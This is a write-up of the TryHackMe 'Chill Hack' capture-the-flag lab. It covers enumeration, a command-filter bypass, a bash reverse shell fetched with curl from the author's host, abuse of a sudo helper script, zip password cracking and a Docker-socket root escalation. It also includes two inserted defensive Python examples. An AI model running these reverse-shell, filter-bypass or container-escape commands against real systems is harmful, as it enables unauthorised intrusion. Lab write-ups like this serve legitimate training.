Tryhackme - Chill Hack

In this walkthrough we will be going through the Chill Hack room from TryHackMe. The room is rated easy on the platform, but it will definitely test your basics and may send you down a rabbit hole. In a nutshell, it tests your enumeration skills and how well you can bypass input blacklisting and validation, and then challenges you with some system exploration and privilege escalation. So, on that note, let's get started.

Machine Info:

Title:      Chill Hack
IP address: 10.10.253.182
Difficulty: Easy
Objective:  Chill the Hack out of the Machine.

Phase 1 – Enumeration

  • First, checking whether the machine is live by pinging it.

  • Started with the regular nmap scan using the “-sS” and “-sV” flags. Found three common ports and services open – 21 (FTP), 22 (SSH) and 80 (HTTP) – with 53 (DNS) showing as filtered.
wh1terose@fsociety:~$ sudo nmap -sS -sV 10.10.253.182 

Nmap scan report for 10.10.253.182
Host is up (0.18s latency).
Not shown: 996 closed ports
PORT   STATE    SERVICE VERSION
21/tcp open     ftp     vsftpd 3.0.3
22/tcp open     ssh     OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
53/tcp filtered domain
80/tcp open     http    Apache httpd 2.4.29 ((Ubuntu))
Service Info: OSs: Unix, Linux; CPE: cpe:/o:linux:linux_kernel

Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 26.88 seconds

  • I started with FTP and tried an anonymous login on the server. It succeeded and I found a note, which I downloaded to my local machine; it reveals a potential username.

wh1terose@fsociety:~$ ftp 10.10.253.182 
Connected to 10.10.253.182.
220 (vsFTPd 3.0.3)
Name (10.10.253.182:wh1terose): anonymous
331 Please specify the password.
Password:
230 Login successful.
Remote system type is UNIX.
Using binary mode to transfer files.
ftp> ls
200 PORT command successful. Consider using PASV.
150 Here comes the directory listing.
-rw-r--r--    1 1001     1001           90 Oct 03  2020 note.txt
226 Directory send OK.
ftp> get note.txt
local: note.txt remote: note.txt
200 PORT command successful. Consider using PASV.
150 Opening BINARY mode data connection for note.txt (90 bytes).
226 Transfer complete.
90 bytes received in 0.00 secs (45.8719 kB/s)
ftp> exit
221 Goodbye.

  • Next I moved to port 80 (HTTP). Started off by firing gobuster at it to reveal some juicy endpoints. Got something close to what I expected: a secret directory literally called “secret”.
wh1terose@fsociety:~$ gobuster dir -u http://10.10.253.182/ -w ~/Desktop/Wordlist/common.txt 
===============================================================
Gobuster v3.1.0
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url:                     http://10.10.253.182/
[+] Method:                  GET
[+] Threads:                 10
[+] Wordlist:                /home/wh1terose/Desktop/Wordlist/common.txt
[+] Negative Status codes:   404
[+] User Agent:              gobuster/3.1.0
[+] Timeout:                 10s
===============================================================
2023/04/30 11:51:35 Starting gobuster in directory enumeration mode
===============================================================
/.hta                 (Status: 403) [Size: 278]
/.htaccess            (Status: 403) [Size: 278]
/.htpasswd            (Status: 403) [Size: 278]
/css                  (Status: 301) [Size: 312] [--> http://10.10.253.182/css/]
/fonts                (Status: 301) [Size: 314] [--> http://10.10.253.182/fonts/]
/images               (Status: 301) [Size: 315] [--> http://10.10.253.182/images/]
/index.html           (Status: 200) [Size: 35184]                                 
/js                   (Status: 301) [Size: 311] [--> http://10.10.253.182/js/]    
/secret               (Status: 301) [Size: 315] [--> http://10.10.253.182/secret/]
/server-status        (Status: 403) [Size: 278]                                   
                                                                                  
===============================================================
2023/04/30 11:53:03 Finished
===============================================================

  • The secret directory contains a search field which lets us execute commands on the underlying server; however, the input is filtered and only some commands are allowed through. I tried “ls”, which was “blocked”, then tried “pwd”, which worked.

Phase 2 – Initial Access

  • Next I tried various commands I could work with but, to be honest, I was banging my head against the wall on this for a while. Eventually I found that I can bypass the restriction on “ls” by inserting a backslash into it: the filter matches the literal string, while the shell drops the escape and runs ls. Plus, the list of disallowed commands can be seen in the page's source code.

l\s -la

  • As per that list, there is no restriction on commands that can download content from the web, such as wget or curl. So I hosted the one-liner reverse shell below and executed it through the command field with curl to get initial entry into the machine.

# shell.sh, hosted on the attacker box: a bash reverse shell
bash -i >& /dev/tcp/10.18.11.103/4444 0>&1

# Execute the shell through the command field using curl; the backslash in "ba\sh"
# gets the script past the same literal filter that blocked "ls"
curl 10.18.11.103:8000/shell.sh | ba\sh
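To see why the literal deny list falls to the backslash trick while an allow list that parses input the way the shell does holds up, here is an added example (not code from the original post or from the room). The deny list, allow list and argument character set are assumptions; the executor runs with shell=False so a second round of shell parsing cannot reintroduce the bypass.

```python
import re
import shlex
import subprocess
from typing import List, Optional

# Deny list in the style of the challenge's command field: command names
# compared as literal strings. The real list is not on the page; these
# two entries are assumed for the demonstration.
DENY = {"ls", "bash"}
# Hardened alternative: exact allow list plus a strict argument charset (assumed).
ALLOW = {"pwd", "id", "whoami", "date"}
SAFE_ARG = re.compile(r"^[A-Za-z0-9_./-]+$")


def deny_list_filter(user_input: str) -> bool:
    """True if the challenge-style filter lets the input reach the shell.
    It compares only the literal first word, so 'l\\s' != 'ls' slips by."""
    first = user_input.strip().split(" ", 1)[0]
    return first not in DENY


def shell_would_run(user_input: str) -> List[str]:
    """What a POSIX shell executes after dequoting: the backslash in
    'l\\s -la' disappears and the words become ['ls', '-la']."""
    return shlex.split(user_input)


def hardened_filter(user_input: str) -> Optional[List[str]]:
    """Parse like the shell first, then require an allow-listed command and
    plain arguments. Returns argv to run without a shell, or None to reject."""
    try:
        argv = shlex.split(user_input)
    except ValueError:          # unbalanced quotes and the like
        return None
    if not argv or argv[0] not in ALLOW:
        return None
    if not all(SAFE_ARG.match(a) for a in argv[1:]):
        return None             # rejects '|', ';', '$(...)', redirections
    return argv


def run_allowed(user_input: str) -> Optional[str]:
    """Execute only what hardened_filter approved, with shell=False so no
    second round of shell parsing can reintroduce the bypass."""
    argv = hardened_filter(user_input)
    if argv is None:
        return None
    return subprocess.run(argv, capture_output=True, text=True, timeout=5).stdout
```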

Phase 3 – Further exploitation & exploration

  • Once I had my initial shell, I listed the sudo configuration for the current user. Found that a script, /home/apaar/.helpline.sh, can be executed as user apaar without a password.
www-data@ubuntu:/var/www/html/secret$ sudo -l
sudo -l
Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,
    secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
www-data@ubuntu:/var/www/html/secret$ 
  • Peeking into the script to understand what it does: at the end, the $msg variable, read straight from the user, is expanded unquoted and executed as a command, which we will exploit later. But first let's stabilize our shell.

www-data@ubuntu:/var/www/html/secret$ cat /home/apaar/.helpline.sh
cat /home/apaar/.helpline.sh
#!/bin/bash

echo
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
echo

read -p "Enter the person whom you want to talk with: " person

read -p "Hello user! I am $person,  Please enter your message: " msg

$msg 2>/dev/null

echo "Thank you for your precious time!"
www-data@ubuntu:/var/www/html/secret$ 
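
As an added example (not from the original post), this audit parses the sudo -l output above and flags NOPASSWD rules whose target script executes a variable in command position, which is exactly the .helpline.sh weakness. The sample texts are embedded copies of what the walkthrough printed, and the script lookup dict stands in for reading the files from disk.

```python
import re

# Constructed samples: the "sudo -l" output and the script shown above,
# embedded so the audit runs offline.
SUDO_L = """Matching Defaults entries for www-data on ubuntu:
    env_reset, mail_badpass,

User www-data may run the following commands on ubuntu:
    (apaar : ALL) NOPASSWD: /home/apaar/.helpline.sh
"""
HELPLINE_SH = """#!/bin/bash
echo "Welcome to helpdesk. Feel free to talk to anyone at any time!"
read -p "Enter the person whom you want to talk with: " person
read -p "Hello user! I am $person,  Please enter your message: " msg
$msg 2>/dev/null
echo "Thank you for your precious time!"
"""

# "(runas) TAG: cmd, cmd" lines; the Defaults block never starts with "(".
RULE_RE = re.compile(r"^\s*\((?P<runas>[^)]+)\)\s*(?P<tags>(?:[A-Z]+:\s*)*)(?P<cmds>.+)$")
# A variable expansion in command position: whatever it holds gets executed.
CMD_POS_VAR = re.compile(r'^\s*"?\$\{?\w+\}?"?(\s|$)')


def parse_sudo_rules(text):
    """Return (runas_user, nopasswd, command) tuples from 'sudo -l' output."""
    rules = []
    for line in text.splitlines():
        m = RULE_RE.match(line)
        if m:
            runas = m.group("runas").split(":")[0].strip()
            nopasswd = "NOPASSWD" in m.group("tags")
            rules.extend((runas, nopasswd, c.strip()) for c in m.group("cmds").split(","))
    return rules


def command_position_expansions(script):
    """1-based line numbers where user-controlled data becomes the command."""
    return [n for n, line in enumerate(script.splitlines(), 1) if CMD_POS_VAR.match(line)]


def risky_rules(sudo_text, scripts):
    """NOPASSWD rules whose target (looked up in `scripts`, path -> text)
    executes a variable as a command, i.e. a free shell as the runas user."""
    findings = []
    for runas, nopasswd, cmd in parse_sudo_rules(sudo_text):
        path = cmd.split()[0]
        lines = command_position_expansions(scripts.get(path, ""))
        if nopasswd and lines:
            findings.append((runas, path, lines))
    return findings
```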

  • Upgrading the shell to a full TTY.

www-data@ubuntu:/var/www/html/secret$ python3 -c 'import pty;pty.spawn("/bin/bash")'
<ret$ python3 -c 'import pty;pty.spawn("/bin/bash")'
www-data@ubuntu:/var/www/html/secret$ ^Z
[1]+  Stopped                 nc -lvnp 4444
wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ stty raw -echo;fg
nc -lvnp 4444

www-data@ubuntu:/var/www/html/secret$ stty rows 29 columns 126
www-data@ubuntu:/var/www/html/secret$ export TERM=success
www-data@ubuntu:/var/www/html/secret$    
  • Now we exploit that variable ($msg) by supplying /bin/bash as the message, which gives us a shell as apaar and finally our user flag.
www-data@ubuntu:/var/www/html/secret$ sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: ian
Hello user! I am ian,  Please enter your message: /bin/bash
python3 -c 'import pty;pty.spawn("/bin/bash")'
apaar@ubuntu:/var/www/html/secret$ ls
images  index.php
apaar@ubuntu:/var/www/html/secret$ cat /home/apaar/local.txt
{USER-FLAG: e8vpd3323cfvlp0qpxxx9qtr5iq37oww}
apaar@ubuntu:/var/www/html/secret$ 

Phase 4 – Privilege Escalation

  • The earlier scan had missed port 8000, which turned out to be open. There I found an image, which I downloaded and ran through steghide to extract its hidden data. The hidden data is a zip file, but it was password protected, so I used john to crack the password. Opening the zip with the recovered password reveals a source code file.

#Getting the image file from the server.

wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ wget http://10.10.251.210:8000/hacker-with-laptop_23-2147985341.jpg
--2023-04-30 13:43:02--  http://10.10.251.210:8000/hacker-with-laptop_23-2147985341.jpg
Connecting to 10.10.251.210:8000... connected.
HTTP request sent, awaiting response... 200 OK
Length: 68841 (67K) [image/jpeg]
Saving to: ‘hacker-with-laptop_23-2147985341.jpg’

hacker-with-laptop_2 100%[====================>]  67.23K  41.6KB/s    in 1.6s    

2023-04-30 13:43:04 (41.6 KB/s) - ‘hacker-with-laptop_23-2147985341.jpg’ saved [68841/68841]

#Extracting data with steghide.

wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ steghide --extract -sf hacker-with-laptop_23-2147985341.jpg 
Enter passphrase: 
wrote extracted data to "backup.zip".


wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ unzip backup.zip 
Archive:  backup.zip
[backup.zip] source_code.php password: 
   skipping: source_code.php         incorrect password

#Using john to crack the password of the zip file.

wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ ~/Tools/john/run/zip2john backup.zip > crack.txt
ver 2.0 efh 5455 efh 7875 backup.zip/source_code.php PKZIP Encr: TS_chk, cmplen=554, decmplen=1211, crc=69DC82F3 ts=2297 cs=2297 type=8
wh1terose@fsociety:~/CTF/TryHackme/Chill Hack$ ~/Tools/john/run/john crack.txt 
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 8 OpenMP threads
Proceeding with single, rules:Single
Press 'q' or Ctrl-C to abort, 'h' for help, almost any other key for status
Almost done: Processing the remaining buffered candidate passwords, if any.
0g 0:00:00:00 DONE 1/3 (2023-04-30 13:46) 0g/s 1340Kp/s 1340Kc/s 1340KC/s Phpsource1900..Pcode1900
Proceeding with wordlist:/home/wh1terose/Tools/john/run/password.lst
Enabling duplicate candidate password suppressor
pass1word        (backup.zip/source_code.php)     
1g 0:00:00:00 DONE 2/3 (2023-04-30 13:46) 7.142g/s 595814p/s 595814c/s 595814C/s 123456..abundance
Use the "--show" option to display all of the cracked passwords reliably
Session completed. 

  • Taking a dive into the source code, we can see that the login check compares the base64 encoding of the submitted password against a hard-coded string for the user Anurodh. You know where this is going now.
<html>
<head>
	Admin Portal
</head>
        <title> Site Under Development ... </title>
        <body>
                <form method="POST">
                        Username: <input type="text" name="name" placeholder="username"><br><br>
			Email: <input type="email" name="email" placeholder="email"><br><br>
			Password: <input type="password" name="password" placeholder="password">
                        <input type="submit" name="submit" value="Submit"> 
		</form>
<?php
        if(isset($_POST['submit']))
	{
		$email = $_POST["email"];
		$password = $_POST["password"];
		if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
		{ 
			$random = rand(1000,9999);?><br><br><br>
			<form method="POST">
				Enter the OTP: <input type="number" name="otp">
				<input type="submit" name="submitOtp" value="Submit">
			</form>
		<?php	mail($email,"OTP for authentication",$random);
			if(isset($_POST["submitOtp"]))
				{
					$otp = $_POST["otp"];
					if($otp == $random)
					{
						echo "Welcome Anurodh!";
						header("Location: authenticated.php");
					}
					else
					{
						echo "Invalid OTP";
					}
				}
 		}
		else
		{
			echo "Invalid Username or Password";
		}
        }
?>
</html>

  • Used CyberChef to base64-decode the hard-coded value. It gives: !d0ntKn0wmYp@ssw0rd

  • With the new username and password, we log in over SSH as anurodh to get ahead on our privilege-escalation journey for this box.

  • To get a root shell and the flag, I exploited the Docker socket access with a one-liner from GTFOBins: the container bind-mounts the host root at /host and chroots into it. The first attempt failed because the machine could not pull the ubuntu image, so I reused the locally available alpine image.

anurodh@ubuntu:~$  docker -H unix:///var/run/docker.sock run -v /:/host -it ubuntu chroot /host /bin/bash
Unable to find image 'ubuntu:latest' locally
docker: Error response from daemon: Get https://registry-1.docker.io/v2/: net/http: request canceled while waiting for connection (Client.Timeout exceeded while awaiting headers).
See 'docker run --help'.
anurodh@ubuntu:~$ docker images
REPOSITORY          TAG                 IMAGE ID            CREATED             SIZE
alpine              latest              a24bb4013296        2 years ago         5.57MB
hello-world         latest              bf756fb1ae65        3 years ago         13.3kB
anurodh@ubuntu:~$ docker -H unix:///var/run/docker.sock run -v /:/host -it alpine chroot /host /bin/bash
groups: cannot find name for group ID 11
To run a command as administrator (user "root"), use "sudo <command>".
See "man sudo_root" for details.

root@fd09d321605c:/# cd /root 
root@fd09d321605c:~# ls
proof.txt
root@fd09d321605c:~# cat proof.txt 


					{ROOT-FLAG: w18gfpn9xehsgd3tovhk0hby4gdp89bg}


Congratulations! You have successfully completed the challenge.


         ,-.-.     ,----.                                             _,.---._    .-._           ,----.  
,-..-.-./  \==\ ,-.--` , \   _.-.      _.-.             _,..---._   ,-.' , -  `. /==/ \  .-._ ,-.--` , \ 
|, \=/\=|- |==||==|-  _.-` .-,.'|    .-,.'|           /==/,   -  \ /==/_,  ,  - \|==|, \/ /, /==|-  _.-` 
|- |/ |/ , /==/|==|   `.-.|==|, |   |==|, |           |==|   _   _\==|   .=.     |==|-  \|  ||==|   `.-. 
 \, ,     _|==/==/_ ,    /|==|- |   |==|- |           |==|  .=.   |==|_ : ;=:  - |==| ,  | -/==/_ ,    / 
 | -  -  , |==|==|    .-' |==|, |   |==|, |           |==|,|   | -|==| , '='     |==| -   _ |==|    .-'  
  \  ,  - /==/|==|_  ,`-._|==|- `-._|==|- `-._        |==|  '='   /\==\ -    ,_ /|==|  /\ , |==|_  ,`-._ 
  |-  /\ /==/ /==/ ,     //==/ - , ,/==/ - , ,/       |==|-,   _`/  '.='. -   .' /==/, | |- /==/ ,     / 
  `--`  `--`  `--`-----`` `--`-----'`--`-----'        `-.`.____.'     `--`--''   `--`./  `--`--`-----``  


--------------------------------------------Designed By -------------------------------------------------------
					|  Anurodh Acharya |
					---------------------

	               		     Let me know if you liked it.

Twitter
	- @acharya_anurodh
Linkedin
	- www.linkedin.com/in/anurodh-acharya-b1937116a



root@fd09d321605c:~# 

Conclusion

So that was “Chill Hack” for you. Trust me, it wasn't chill for me. It was meant to be an easy box, yet at some points it had me going around in circles. Summing it up: we started with an nmap scan and found the usual FTP, SSH and HTTP ports open. On FTP, an anonymous login gave us note.txt, which reveals potential usernames. On the web side, gobuster revealed a secret directory holding a command field that executes commands on the underlying operating system; abusing it with curl gave us initial access. Checking the sudo configuration revealed a script that can be run as the user apaar; we stabilized the shell and exploited the script to get a shell as apaar. We had also missed port 8000, which serves an image file; downloading it and extracting its hidden content with steghide yielded backup.zip, whose password we cracked with john. The zip contains source code with a hard-coded password for the user anurodh, which we decoded and used to log in over SSH. Finally, we exploited the Docker misconfiguration to get the root flag and my old forgotten nudes.
